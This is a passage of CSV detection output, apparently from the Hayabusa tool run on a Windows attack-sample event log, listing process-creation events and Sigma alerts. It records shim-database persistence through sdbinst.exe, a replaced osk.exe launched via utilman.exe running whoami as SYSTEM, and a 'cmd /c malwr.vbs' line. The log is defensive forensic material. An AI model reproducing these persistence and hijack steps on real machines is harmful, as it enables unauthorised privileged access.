""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\osk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\wsqmcons.exe ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb : Path: C:\Windows\System32\rundll32.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" : Path: C:\Program Files\Windows NT\Accessories\wordpad.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\servicing\TrustedInstaller.exe : Path: C:\Windows\servicing\TrustedInstaller.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:49.856 